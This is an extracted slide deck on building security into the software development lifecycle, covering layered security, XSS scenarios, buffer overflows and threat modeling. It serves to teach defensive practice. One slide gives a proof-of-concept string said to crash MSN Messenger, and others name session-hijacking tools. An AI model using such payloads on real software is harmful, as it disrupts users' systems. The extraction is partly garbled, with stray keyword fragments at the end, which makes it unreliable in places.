security as a process in software development lifecycle v2.0

Security As A Process In Software Development Lifecycle

Presented By:Ahmed Saafan

Agenda

Security layers Software lifecycle evolution Security in modern software lifecycle

Analysis phase activities Design & Development phases activities

Threat Modeling Deployment & testing phases activities

A final word

Security Layers

Layered Security approach (security in depth)

Physical Security Network Security Host (OS) Security Application Security

Security Layers Network Level vulnerabilities

DoS Packet inspection , password sniffing Identity theft (Spoofing)

Network breach mitigation techniques Firewalls IDSs, IPSs & IDPs Logs Analysis

Security Layers Host (OS) vulnerabilities

Hardware firmware vulnerabilities Windows!! RPC

Host threats mitigation Choose the right one Don’t just patch, protect.

Security Layers Application level vulnerabilities

SQL injection Application DoS Session Hijacking

Ahmed

PRoof Of Concept DoS Attack: put in ur personal msg on MSN msngr the string: n—a_Á—ay±m—a�ÁÇáç±Çáß±Çá§ÁaÇáÇ±OÇá—±Çá§±Çár×ÁÇ á+NÇ áLáÇáThe Solution:Delete your directory of your account "[email protected]" inC:\Documents and Settings\YOURSESSION\Local Settings\Application Data\Mcft\Windows Live Contacts

Ahmed

Applications that automate session hijacking:Juggernaut, T-Sight


SQL injection Application DoS Session Hijacking Cross site scripting (XSS)

XSS

Type-0 attack

Type-1 attack

Type-2 attack

Ahmed

1.ELdoKsh sends a URL to Hamada (via email or another mechanism) of a maliciously constructed web page.2.Hamada clicks on the link.3.The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Hamada's computer.4.The vulnerable HTML page contains JavaScript which executes in Hamada's computer's local zone.5.ELdoKsh's malicious script now may run commands with the privileges Hamada holds on his own computer.

Ahmed

1.Hamada often visits a particular website, which is hosted by Micro$oft. Micro$oft's website allows Hamada to log in with a username/password pair and store sensitive information, such as billing information.2.ELdoKsh observes that Micro$oft's website contains a reflected XSS vulnerability.3.ELdoKsh crafts a URL to exploit the vulnerability, and sends Hamada an email, making it look as if it came from Micro$oft (ie. the email is spoofed).4.Hamada visits the URL provided by ELdoKsh while logged into Micro$oft's website.5.The malicious script embedded in the URL executes in Hamada's browser, as if it came directly from Micro$oft's server. The script steals sensitive information (authentication credentials, billing info, etc) and sends this to ELdoKsh's web server without Hamada's knowledge.

Ahmed

1.Micro$oft hosts a web site which allows users to post messages and other content to the site for later viewing by other members.2.ELdoKsh notices that Micro$oft's website is vulnerable to a type 2 XSS attack.3.ELdoKsh posts a message, controversial in nature, which may encourage many other users of the site to view it.4.Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to ELdoKsh's webserver without their knowledge.5.Later, ELdoKsh logs in as other site users and posts messages on their behalf....


SQL injection Application DoS Session Hijacking Cross site scripting (XSS) Buffer Overflow exploits Unhandled exceptions' exploits

Ahmed

Windows Vista Avoids this by:-Address Space Layout Randomization (ASLR)-GS Stack ProtectionLinux Has Embedded memory protection since 1996 !


SQL injection Application DoS Session Hijacking Cross site scripting (XSS) Buffer Overflow exploits Unhandled exceptions' exploits

Is there a mitigation technique ?

Software lifecycle evolution

Functional Programming / Flow charts

Object Oriented Programming / Design

UML standards & modern SW lifecycle

Software lifecycle evolution

Security in modern software lifecycle

Hit backs due to security (patches)

The need for a more secure software

Security as a process in SDLC

Analysis phase activities

Take into consideration:

Confidentiality Integrity Availability Possession Authenticity Utility

Ahmed

•Confidentiality : limit access to authorized users•Integrity: guarantee that the data is right and from the right person•Availability: information is available when needed•Possession: ownership control of information (distinct from confidentiality)•Authenticity: people can’t deny their actions because they are directly related to them•Utility: usefulness; If data is encrypted and the decryption key is unavailable then this is lack of utility (they are still confidential , possessed , integral and authentic)

Design & Development phases activities Take into consideration:

Input/Output validation


Input/Output validation Principle of least privilege / default deny Compartmentalization (Separation of Privileges) Threat Modeling

Threat Modeling

Steps for threat Modeling:

1. Identify critical assets

2. Decompose the system• Network Diagram• Functionality diagram

Threat Modeling

3. Identify Possible points of attack

Trust Boundaries

Data Classification

Threat Modeling

Identify Threats for each node STRIDE

Model

Threat Modeling Step-by-step Model (Checklists)

Network Threats Web services subjected to a denial of service attack IP spoofing Faulty configuration of firewall rules, allowing outsiders to get access to

a database and change the data Errors in ACLs Sensitive data that flows unencrypted through the network

Host Threats Using un-patched servers allows crackers to exploit known

vulnerabilities Lack of clearly defined trust boundaries Improper server hardening guidelines resulting in a mismatch between

the server configuration and the security context in which it’s placed Application Threats

Code that’s prone to buffer overflows, SQL injection, or cross-site scripting

Defective or missing data encryption resulting in password compromise

Threat Modeling

Attack Trees

Threat Modeling

5. Categorize & prioritize threats Risk = Probability of occurrence (PO)

X Bussiness impact (BI)

DREAD Model

Project Risk Analysis on threat trees

Threat Modeling

6. Mitigate

Add Cost of mitigation to attack trees

Take decision based on risk vs. cost

Threat Modeling

Important Notes:

Consider everything that might go wrong will go wrong

Dynamic Nature of attack trees

Ahmed

Due to change of the requirements, the rapid change of technology and the occurence of new exploits everyday

Threat Modeling In A Nutshell1. Identify critical assets2. Decompose the system

• Network Diagram• Functionality diagram

3. Identify Possible points of attack• Trust boundaries• Data classification

4. Identify threats• STRIDE model OR Step-by-step model• Attack trees

5. Categorize and prioritize threats• Risk = PO X BI• DREAD model to calculate PO & BI• Project risks on attack trees

6. Mitigate• Add cost of mitigation to attack trees• Take decision based on risk vs cost


Input/Output validation Principle of least privilege / default deny Compartmentalization (Separation of Privileges) Threat Modeling Threat Trees Integrate security Into Quality assurance process Sanitization of data between subsystems Encryption of all communication must be possible No transmission of passwords in plain text Coding standards checklists Logging

Ahmed

Re validate input when crossing subsystems

Deployment & testing phases activities

Take into consideration: IT infrastructure availability Hardware requirements are met Remove Trapdoors (Maintenance hooks) External team to ensure risk mitigation If possible, Get a black hat! Stress testing Regression testing Disaster recovery/system continuity

Ahmed

On February 22 2007 Participants were given local client access to the target computer and invited to try their luck to have root access. An Australian “gwerdna” won a macbook pro by cracking it in under 30 minsOn 7 october 2007 About 100 hackers took on the challenge to take the Yahoo! APIs and create something using them in 24 hours in a day called hackday!. In the end, we had 31 submitted hacks and each team or single hacker had his 90 seconds of fame presenting the hack on three massive screens to the whole assembled audience and the 7 judges

A Final word

“ Security is a process and not a product”

-Bruce Schneir

Open source software (OSS) and security

Thank youReferences: Software Engineering – Security as a Process in the

SDLC , James Purcell 2007 Hack proofing your network, Syngress 2000 Improving Security across SDLC, Task force report 2004 Don’t Just Patch, Protect!, Paul Wright 2007 Packet Sniffing In a Switched Environment, Tom King

2006 wikipedia.org/wiki/Session_hijacking www.0x000000.com/?i=424 , Secure Input validation en.wikipedia.org/wiki/Buffer_overflow Inside the Buffer Overflow Attack:Mechanism, Method,

& Prevention, Mark E. Donaldson Software Engineering, Sommerville 2005 Assumptions In Intrusion Analysis, by Rodney Caudle.

Thank youReferences: http://www.securityfocus.com/columnists/445 , Security

Analogies by Scott Granneman. http://www.securityfocus.com/columnists/420, Surprises

Inside Microsoft Vista's EULA by Scott Granneman. http://www.microsoft.com/technet/technetmag/issues/2005/01/

SessionHijacking/?topics=/technet/technetmag/issues/2005/01/SessionHijacking

Exploiting The Otherwise Non-exploitable on windows, by Miller Skywing

A Practical Approach To Threat Modeling, by Tom Olzak Foundation Of Attack Trees, by Sjouke Mauw From product to process: Bruce Schneier's take on

security , By M. E. Kaba, Network World Security Newsletter

security as a process in software development lifecycle v2.0

Documents

web site

ofts website

eldoksh notices

eldoksh logs

privileges hamada

ofts server

site users session cookies

hamadas knowledge